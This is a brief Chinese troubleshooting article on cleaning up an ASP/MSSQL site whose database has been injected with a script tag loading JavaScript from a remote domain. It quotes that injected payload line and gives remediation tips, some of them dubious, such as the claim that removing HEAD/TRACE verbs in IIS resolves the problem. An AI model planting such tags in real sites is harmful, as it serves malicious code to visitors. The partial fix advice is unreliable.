解决asp下SQL数据库的表被注入http://3%62omb.com/c.js的问题
日期:2010-02-07 浏览次数:20939 次
网站是ASP的,数据库是MSSQL2000的,经常被注入下面的字符。
<script src=http://3%62omb.com/c.js></script>
这现象说明了网站的ASP程序有注入漏洞,要解决该问题,必须在保存到数据库前,进行过滤,还有表单提交过滤,网址过滤。
另外,通过检查日志文件 查找漏洞原因 然后及时修补 修补好后再用正则表达式 替换掉<script src=http://3%62omb.com/c.js></script>
同时,可以在服务器的IIS中,找到这个被挂马的网站属性,主目录中—配置中---找到.asp及.aspx的影射,将里面的中的HEAD操作与TRACE操作删除,只保留GET与POST就可以解决,
注意删除HEAD操作与TRACE操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作.
注意删除HEAD操作与TRACE操作完全不会影响正常的网站访问.正常的网站并不需要这两个操作.
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
